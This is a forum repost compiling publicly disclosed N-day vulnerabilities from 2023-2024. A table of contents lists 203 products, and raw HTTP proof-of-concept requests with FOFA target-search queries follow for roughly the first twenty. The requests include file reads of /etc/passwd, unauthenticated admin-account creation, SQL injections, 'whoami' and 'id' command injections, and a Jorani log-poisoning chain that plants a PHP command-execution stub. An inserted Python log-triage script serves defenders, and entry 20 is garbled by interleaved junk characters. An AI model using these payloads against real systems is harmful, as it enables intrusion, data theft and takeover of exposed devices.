中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Compilation of publicly disclosed vulnerabilities, 2023-09 to 2024-06 (repost)

Author: admin    Time: 2024-6-5 14:31
Title: Compilation of publicly disclosed vulnerabilities, 2023-09 to 2024-06 (repost)
Compilation of publicly disclosed vulnerabilities, 2023-09 to 2024-06
道一安全, 2024-06-05 07:41, Beijing
The following article is from 网络安全新视界, author 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities accounts for a large share of attack activity in offensive/defensive exercises. We hope this article is of some help to defenders, who can use its contents to check their own exposure.

Sources: the article covers 203 public PoCs for high-impact vulnerabilities disclosed in China and abroad between September 2023 and May 2024. All of them were collected from other public accounts or websites and compiled and published by the 网络安全新视界 team.

Patches: all of the vulnerabilities are public. For patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few over-long PoCs are replaced by the word PAYLOAD; search for the full PoC yourself if you need it.

Legal rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account's back end and the relevant content will be removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list" gate: this article is the complete, current list. Press F12 and search for a keyword to find an entry.

Bookmark this article if it is useful. You can also follow this public account (网络安全新视界).

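Added example (editor's code, not part of the original article and not from any vendor named in it): one concrete way to do the exposure check the article recommends is to run the request shapes from the PoC list against your own web-server access logs offline. The script below does that for the entries reproduced in this post. The combined-log format, the rule labels, the helper names and the sample log lines are all assumptions or constructions for the example; the request targets in the samples copy the PoCs in the list.

```python
"""Offline triage of HTTP access-log lines against the request shapes
listed in this article (added example; not part of the original post).

Assumptions (not stated on the page): logs are in the common/combined
Apache/Nginx format, and the listed paths are exact enough to match on.
The sample log lines below are constructed for the example."""
import posixpath
import re
from urllib.parse import unquote, urlsplit

# (label, required method or None, regex applied to the decoded path+query)
RULES = [
    ("StarRocks /mem_tracker unauthenticated access", "GET", r"^/mem_tracker\b"),
    ("Casdoor /static traversal", "GET", r"^/static/(\.\./)+"),
    ("EasyCVR userlist disclosure", "GET", r"^/api/v1/userlist\b"),
    ("EasyCVR adduser", "POST", r"^/api/v1/adduser\b"),
    ("NUUO NVR debugging_center_utils command injection", None,
     r"^/__debugging_center_utils___\.php\?log=.*[;|&`$]"),
    ("Sangfor NGAF loadfile.php file read", None, r"^/svpn_html/loadfile\.php\?file="),
    ("808gps MobileAction_downLoad file download", None,
     r"/808gps/MobileAction_downLoad\.action\?path="),
    ("jshERP getAllList auth bypass", None,
     r"/jshERP-boot/user/(getAllList;|\S*\.ico/\.\./getAllList)"),
    ("Landray EIS api.aspx saveImg upload", "POST", r"/eis/service/api\.aspx\?action=saveImg"),
    ("Dahua DSS user_edit.action disclosure", None, r"/admin/cascade_/user_edit\.action"),
    ("Dahua DSS attachment_clearTempFile.action", None, r"/portal/attachment_clearTempFile\.action"),
    ("Dahua ICC readPic file read", None, r"/evo-apigw/evo-cirs/file/readPic\?fileUrl=file:"),
    ("Dahua ICC sysusers/random (fastjson)", "POST", r"/evo-runs/v1\.0/auths/sysusers/random"),
    ("Dahua ICC user/is-exist (log4j)", "POST", r"/evo-apigw/evo-brm/1\.2\.0/user/is-exist"),
    ("Yonyou NC accept.jsp upload", "POST", r"/aim/equipmap/accept\.jsp"),
    ("Yonyou NC registerServlet JNDI", "POST", r"/portal/registerServlet"),
    ("Yonyou NC linkVoucher / showcontent", "GET",
     r"/(portal/pt/yercommon/linkVoucher|ebvp/infopub/showcontent)\?"),
]
COMPILED = [(label, method, re.compile(rx, re.I)) for label, method, rx in RULES]

# Injection fragments that recur in the PoCs (MySQL, MSSQL and Oracle variants).
SQLI = re.compile(
    r"(extractvalue\(|updatexml\(|waitfor\s+delay|dbms_pipe\.receive_message|hashbytes\(|@@version)",
    re.I,
)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_target(target):
    """Decode twice: the DocCMS keyword PoC is double URL-encoded."""
    return unquote(unquote(target))


def escapes_first_dir(path):
    """True when '..' segments push the normalized path out of its first
    directory, e.g. /static/../../etc/passwd -> /etc/passwd."""
    segs = [s for s in path.split("/") if s]
    if not segs or ".." not in segs:
        return False
    norm = posixpath.normpath("/" + "/".join(segs))
    return norm != "/" + segs[0] and not norm.startswith("/" + segs[0] + "/")


def triage_line(line):
    """Return the matched rule labels for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    method = m.group("method")
    target = decode_target(m.group("target"))
    hits = [label for label, want, rx in COMPILED
            if (want is None or want == method) and rx.search(target)]
    if SQLI.search(target):
        hits.append("SQL injection fragment")
    if escapes_first_dir(urlsplit(target).path):
        hits.append("path traversal outside first directory")
    return {"ip": m.group("ip"), "method": method, "target": target,
            "status": m.group("status"), "hits": hits}


def triage(lines):
    """Keep only the lines that matched at least one rule."""
    return [r for r in map(triage_line, lines) if r and r["hits"]]


# Constructed sample lines (not real traffic); the targets copy PoCs from the list.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Jun/2024:10:00:01 +0800] "GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1" 200 1432 "-" "curl/8.0"',
    '10.0.0.5 - - [05/Jun/2024:10:00:02 +0800] "POST /api/v1/adduser HTTP/1.1" 200 57 "-" "python-requests/2.31"',
    '10.0.0.7 - - [05/Jun/2024:10:00:03 +0800] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 200 2201 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [05/Jun/2024:10:00:04 +0800] "GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [05/Jun/2024:10:00:05 +0800] "GET /static/css/app.css HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [05/Jun/2024:10:00:06 +0800] "GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1" 200 44 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for r in triage(SAMPLE_LOG):
        print(r["ip"], r["method"], r["target"][:60], "->", "; ".join(r["hits"]))
```

Access logs only record the request line, so PoCs whose trigger is in the POST body (the fastjson and log4j payloads, the Landray and Yonyou uploads) can only be matched by endpoint here; matching the body needs WAF or reverse-proxy body logging. Treat a hit as a lead, not as proof of compromise: compare the logged status code and response size with what the PoC would produce on a vulnerable host, and keep the generic SQL-fragment and traversal rules in mind as sources of noise on busy sites.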

Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 (Sangfor) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS (DocCMS) keyword unauthenticated SQL injection
10. 蓝凌 (Landray) EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌 (Landray) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. 大华 (Dahua) DSS itcBulletin SQL injection
18. 大华 (Dahua) DSS digital surveillance system user_edit.action information disclosure
19. 大华 (Dahua) DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华 (Dahua) ICC intelligent IoT management platform arbitrary file read
21. 大华 (Dahua) ICC intelligent IoT management platform random remote code execution
22. 大华 (Dahua) ICC intelligent IoT management platform log4j remote code execution
23. 大华 (Dahua) ICC intelligent IoT management platform fastjson remote code execution
24. 用友 (Yonyou) NC 6.5 accept.jsp arbitrary file upload
25. 用友 (Yonyou) NC registerServlet JNDI remote code execution
26. 用友 (Yonyou) NC linkVoucher SQL injection
27. 用友 (Yonyou) NC showcontent SQL injection
28. 用友 NC grouptemplet arbitrary file upload
29. 用友 NC down/bill SQL injection
30. 用友 NC importPml SQL injection
31. 用友 NC runStateServlet SQL injection
32. 用友 NC complainbilldetail SQL injection
33. 用友 NC downTax/download SQL injection
34. 用友 NC warningDetailInfo interface SQL injection
35. 用友 NC-Cloud importhttpscer arbitrary file upload
36. 用友 NC-Cloud soapFormat XXE
37. 用友 NC-Cloud IUpdateService XXE
38. 用友 U8 Cloud smartweb2.RPC.d XXE
39. 用友 U8 Cloud RegisterServlet SQL injection
40. 用友 U8-Cloud XChangeServlet XXE
41. 用友 U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友 GRP-U8 SmartUpload01 file upload
43. 用友 GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友 GRP-U8 bx_dj_check.jsp SQL injection
45. 用友 GRP-U8 ufgovbank XXE
46. 用友 GRP-U8 sqcxIndex.jsp SQL injection
47. 用友 GRP A++Cloud government finance cloud arbitrary file read
48. 用友 U8 CRM swfupload arbitrary file upload
49. 用友 U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. 泛微 (Weaver) E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通 T+ getstorewarehousebystore remote code execution
55. 畅捷通 T+ getdecallusers information disclosure
56. 畅捷通 T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通 T+ keyEdit.aspx SQL injection
58. 畅捷通 T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 permission bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远 (Seeyon) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远 (Seeyon) M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 掌上校园 service management platform service.action remote command execution
77. F22 garment management software system UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒 明御 security gateway aaa_local_web_preview file upload
88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 FE collaborative office platform editflow_manager SQL injection
90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 (Hikvision) operations management center session command execution
93. 奇安信 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality testing system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达 Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立迅 communications command-and-dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command-and-dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command-and-dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command-and-dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communications command-and-dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科 (Hillstone) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS 海洋影视 management system dmku SQL injection
201. 方正 full-media news editing system binary SQL injection
202. 微擎 system AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

PoC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Replace the password value with the MD5 of the password you want to set.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. 深信服 (Sangfor) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin interface with the default account admin, then send the request below. The sysauth cookie comes from that login, as does the ;stok= value in the path (LuCI's per-session token), so both must be taken from your own session. The command is injected through the wifiRebootrange field.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS (DocCMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

PAYLOAD is the double URL-encoding of the following statement (an error-based MySQL injection that returns the current database user):

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌 (Landray) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. 蓝凌 (Landray) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is reused in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST the login form. The language parameter is a path traversal to application/logs, and the login value is a PHP stub that runs the base64-decoded value of the K1SYJPMHLU4Z request header; the stub ends up in that day's log file, which step 3 renders.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPassword

Step 3: send the following request to the target to run the id command. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command, and the date in the log file name matches the day of the step 2 request (here 2023-10-24).
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords. This is the same endpoint as entry 14 reached through a different path-matching bypass.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The PoC calls an MSSQL function to compute the MD5 of 1234; the hash appearing in the response confirms the injection.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 (Dahua) DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. 大华 (Dahua) DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. 大华 (Dahua) DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

* H/ L) R0 _9 l$ X) K20. 大华ICC智能物联综合管理平台任意文件读取, w3 y: Q$ a; H; G
FOFA:body="*客户端会小于800*"
" R: x% }; W0 M4 S/ }GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.10 F* B" H" l! e9 w  q' H8 B
Host: x.x.x.x
4 l2 N6 P5 U( _2 D: J' MUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
( Y. H' p0 P, \+ z4 kConnection: close- K2 G+ v, D7 K; `
Accept: */*2 I) z5 O: K: ^" q8 W' u) v
Accept-Language: en
" q# u' N: @. Y! K+ h" T; M+ YAccept-Encoding: gzip
% [0 i; b1 C9 o) Y7 |/ Y4 ]+ f1 k/ [' X4 s/ ]* K
9 u, I/ Z8 R. g6 Y/ N/ t9 z6 T
21. 大华 (Dahua) ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
